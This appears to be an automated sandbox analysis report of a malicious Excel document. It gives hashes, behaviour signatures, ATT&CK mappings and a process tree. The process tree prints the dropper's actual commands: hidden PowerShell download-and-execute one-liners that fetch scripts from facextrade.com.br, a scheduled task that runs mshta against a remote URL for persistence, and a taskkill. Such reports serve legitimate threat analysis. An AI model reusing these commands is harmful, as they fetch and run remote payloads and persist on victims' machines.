Analysis

  • max time kernel
    135s
  • max time network
    141s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16-08-2022 07:46

General

  • Target

    SecuriteInfo.com.Exploit.Siggen3.17232.17500.xls

  • Size

    33KB

  • MD5

    72b9a844ed7ab767c1de85facfb4ad04

  • SHA1

    88d41799156fcc5c6dc80124cc55cc3f96d940b6

  • SHA256

    392de25228482e17400c27ca87cfe91ddf60b1dedcffd36cad1c52c6a0f7c4d0

  • SHA512

    7214899618bd9ec54db02340a86a345c5273d12c4694f29ebff0d5515fd1eec72b4b4a30f1a267d3e070d7a2d92dbb850ec5f1bec88f0509e103b6f380c9f28b

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 1 IoCs
  • Runs ping.exe 1 TTPs 4 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.Siggen3.17232.17500.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4564
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c ping -n 80 127.0.0.1 & %public%\Outlook.bat exit
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2788
      • C:\Windows\system32\PING.EXE
        ping -n 80 127.0.0.1
        3⤵
        • Runs ping.exe
        PID:4304
      • C:\Windows\system32\cmd.exe
        cmd /c start /min PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/log.txt'))
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2736
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/log.txt'))
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2120
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c ping -n 85 127.0.0.1 & %public%\task.bat exit
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2812
      • C:\Windows\system32\PING.EXE
        ping -n 85 127.0.0.1
        3⤵
        • Runs ping.exe
        PID:3620
      • C:\Windows\system32\cmd.exe
        cmd /c schtasks /create /sc MINUTE /mo 200 /tn "CDT" /tr "\"mshta\"http://facextrade.com.br/logs.php" /F
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4192
        • C:\Windows\system32\schtasks.exe
          schtasks /create /sc MINUTE /mo 200 /tn "CDT" /tr "\"mshta\"http://facextrade.com.br/logs.php" /F
          4⤵
          • Creates scheduled task(s)
          PID:1988
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c ping -n 10 127.0.0.1 & %public%\DefenderFile.bat exit
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:4124
      • C:\Windows\system32\PING.EXE
        ping -n 10 127.0.0.1
        3⤵
        • Runs ping.exe
        PID:4884
      • C:\Windows\system32\cmd.exe
        cmd /c start /min PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/df.txt'))
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1636
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/df.txt'))
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1992
      • C:\Windows\system32\cmd.exe
        cmd /c start /min taskkill /f /im WINWORD.EXE
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1016
        • C:\Windows\system32\taskkill.exe
          taskkill /f /im WINWORD.EXE
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4112
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c ping -n 7 127.0.0.1 & %public%\KilFile.bat exit
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1440
      • C:\Windows\system32\PING.EXE
        ping -n 7 127.0.0.1
        3⤵
        • Runs ping.exe
        PID:2444

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scheduled Task

1
T1053

Persistence

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Remote System Discovery

1
T1018

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    2f57fde6b33e89a63cf0dfdd6e60a351

    SHA1

    445bf1b07223a04f8a159581a3d37d630273010f

    SHA256

    3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

    SHA512

    42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    abc27673d9c940ad74b41c58391d2412

    SHA1

    9a31a521a521dcd0f974ce6f7a50aecc69a50df0

    SHA256

    cb3f2adb2f5e39fbe5ae3c49837d9074a85f21e9be7eb8404444611f78a08357

    SHA512

    c7a574f9a53d29e2212500eb48fb05f475bac1e21b858f58e0e441caabea760ba7b7425a98610bf91e66d662f70a91c210b522bbecad3f5180e1aedbf6cfcdc4

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    6KB

    MD5

    d1e84d7dd10ade0d73c04908f7a55809

    SHA1

    e8b5631f1fb1b4fe5a44aa8ec79df4829b52fb23

    SHA256

    0cc8900114868ed0ac000990099b4d04ba81654cb57c9ba35e40796561fb17e3

    SHA512

    0e4ed03e285f202ae406e9622bcf275a668c74771869926f7b3a6403be4272e1a6144b97587347642a2a517d2b375e496a59c583b665ec39cc3a947526a2b24f

  • C:\Users\Public\DefenderFile.bat
    Filesize

    1KB

    MD5

    ae4a0997ce01f4ebbb3f3cc0054ce933

    SHA1

    e5bfe3b390f1208b8b6ea0317f4364005f552851

    SHA256

    a33dd1505c2ac665e6e1fd424a048997ec0f43914b8f73037bd94dc2e89e35ce

    SHA512

    5de2f43af7756cd7be659d6f03314240e08ecfee7bcb97b45f828ef938a0a0a84b0c36667d0447fd5bfa4851e5eef9cf98182933bda86b42af4a154b37b2f184

  • C:\Users\Public\Outlook.bat
    Filesize

    900B

    MD5

    0427a3545c2eaed3167cffe2cf5f8aba

    SHA1

    b27f3a7d2b855f1d0b84727603add711bb6f6170

    SHA256

    ec7da386a5fc7007e33ffdcd8ab64b6ac207d1886e04b9b60f27a95533347391

    SHA512

    fafb712a5b636c0118128c2d448271680e66fc73fac67538f4b84c9917a7053470d7710ce508cfd82c941942e469bd3d048d7ebbcefa99797542ad026dfe038b

  • C:\Users\Public\task.bat
    Filesize

    954B

    MD5

    20a395a26f50352dc994664c3e7df533

    SHA1

    9b6407d22297b7af7c49aacd51bf42e51ced7029

    SHA256

    c6c13b53153f21b2486096732847ddb48b8eb888bd3d6ab93ee1f958fcea1b32

    SHA512

    2b974da0b7859584e39a9afa2fdf74fb1efba58e68d0c7b420065254f2cf017a8eb393c5f061a12f6ea79c729cebf5f81749b8cf14159ad331aae1daa7701617

  • memory/1016-150-0x0000000000000000-mapping.dmp
  • memory/1440-142-0x0000000000000000-mapping.dmp
  • memory/1636-148-0x0000000000000000-mapping.dmp
  • memory/1988-171-0x0000000000000000-mapping.dmp
  • memory/1992-154-0x00007FF9B3400000-0x00007FF9B3EC1000-memory.dmp
    Filesize

    10.8MB

  • memory/1992-152-0x0000023154F00000-0x0000023154F22000-memory.dmp
    Filesize

    136KB

  • memory/1992-155-0x00007FF9B3400000-0x00007FF9B3EC1000-memory.dmp
    Filesize

    10.8MB

  • memory/1992-149-0x0000000000000000-mapping.dmp
  • memory/1992-153-0x00007FF9B3400000-0x00007FF9B3EC1000-memory.dmp
    Filesize

    10.8MB

  • memory/2120-159-0x0000000000000000-mapping.dmp
  • memory/2120-168-0x00007FF9B3400000-0x00007FF9B3EC1000-memory.dmp
    Filesize

    10.8MB

  • memory/2120-167-0x00007FF9B3400000-0x00007FF9B3EC1000-memory.dmp
    Filesize

    10.8MB

  • memory/2444-144-0x0000000000000000-mapping.dmp
  • memory/2736-158-0x0000000000000000-mapping.dmp
  • memory/2788-139-0x0000000000000000-mapping.dmp
  • memory/2812-140-0x0000000000000000-mapping.dmp
  • memory/3620-145-0x0000000000000000-mapping.dmp
  • memory/4112-151-0x0000000000000000-mapping.dmp
  • memory/4124-141-0x0000000000000000-mapping.dmp
  • memory/4192-170-0x0000000000000000-mapping.dmp
  • memory/4304-146-0x0000000000000000-mapping.dmp
  • memory/4564-138-0x00007FF9997B0000-0x00007FF9997C0000-memory.dmp
    Filesize

    64KB

  • memory/4564-161-0x00007FF99C110000-0x00007FF99C120000-memory.dmp
    Filesize

    64KB

  • memory/4564-162-0x00007FF99C110000-0x00007FF99C120000-memory.dmp
    Filesize

    64KB

  • memory/4564-163-0x00007FF99C110000-0x00007FF99C120000-memory.dmp
    Filesize

    64KB

  • memory/4564-164-0x00007FF99C110000-0x00007FF99C120000-memory.dmp
    Filesize

    64KB

  • memory/4564-135-0x00007FF99C110000-0x00007FF99C120000-memory.dmp
    Filesize

    64KB

  • memory/4564-133-0x00007FF99C110000-0x00007FF99C120000-memory.dmp
    Filesize

    64KB

  • memory/4564-136-0x00007FF99C110000-0x00007FF99C120000-memory.dmp
    Filesize

    64KB

  • memory/4564-137-0x00007FF9997B0000-0x00007FF9997C0000-memory.dmp
    Filesize

    64KB

  • memory/4564-134-0x00007FF99C110000-0x00007FF99C120000-memory.dmp
    Filesize

    64KB

  • memory/4564-132-0x00007FF99C110000-0x00007FF99C120000-memory.dmp
    Filesize

    64KB

  • memory/4884-143-0x0000000000000000-mapping.dmp